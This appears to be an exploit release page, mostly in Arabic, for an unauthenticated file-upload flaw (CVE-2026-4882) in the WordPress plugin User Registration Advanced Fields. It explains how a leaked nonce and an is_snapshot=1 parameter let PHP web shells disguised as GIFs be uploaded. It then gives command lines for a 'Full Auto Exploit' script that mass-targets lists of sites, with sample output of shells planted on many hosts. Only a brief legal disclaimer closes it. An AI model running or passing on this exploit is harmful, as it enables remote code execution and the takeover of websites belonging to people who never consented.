
User Registration Advanced Fields <= 1.6.20 - رفع ملفات تعسفي دون مصادقة
User Registration Advanced Fields <= 1.6.20 - رفع ملف تعسفي بدون مصادقة
User Registration Advanced Fields <= 1.6.20 - رفع ملف تعسفي بدون مصادقة
الوصف
إن إضافة User Registration Advanced Fields لووردبريس (الإصدارات حتى 1.6.20) معرضة لثغرة رفع ملفات تعسفي بدون مصادقة عبر إجراء AJAX uraf_profile_picture_upload_method_upload. تقوم الإضافة بتسريب nonce صالح عبر wp_localize_script() في أي صفحة تحتوي على نموذج تسجيل، كما أن استخدام المعامل is_snapshot=1 يتجاوز التحقق من امتداد الملف بالكامل. وهذا يسمح للمهاجمين غير المصادق عليهم برفع ملفات تعسفية (مثل قذائف PHP ويب مقنعة كصور GIF)، والتي تُخزَّن في wp-content/uploads/user_registration_uploads/temp-uploads/، مما يؤدي إلى تنفيذ كامل للتعليمات البرمجية عن بُعد (RCE).
~ درجة CVSS: 9.8 (حرجة)
~ الإصدارات المتأثرة: <= 1.6.20
هدف واحد :
python3 shadow.py -u https://target.com -s shadow.phpأهداف متعددة :
python3 shadow.py -f targets.txt -s shadow.php -t 30الوضع التفاعلي :
python3 shadow.py
╔══════════════════════════════════════════════════╗
║ CVE-2026-4882 — Full Auto Exploit ║
║ User Registration Advanced Fields <= 1.6.20 ║
║ by: Shadow x Friska 😈🔥 ║
╚══════════════════════════════════════════════════╝
═══ Interactive Mode ═══
📄 Target file (e.g. targets.txt): list.txt
⚡ Threads 1-50 (default 30): 30
🎯 Targets : 75
📁 Shell : shadow.php
⚡ Threads : 30
💣 Brute : 1-500
🩷 [3/75] http://target.com
→ http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
💀 [1/75] http://example.com — no nonce
❌ [4/75] http://example2.com — upload failed
الاستخدام غير المصرح به للأنظمة التي لا تملكها أو ليس لديك إذن لاختبارها يعد غير قانوني.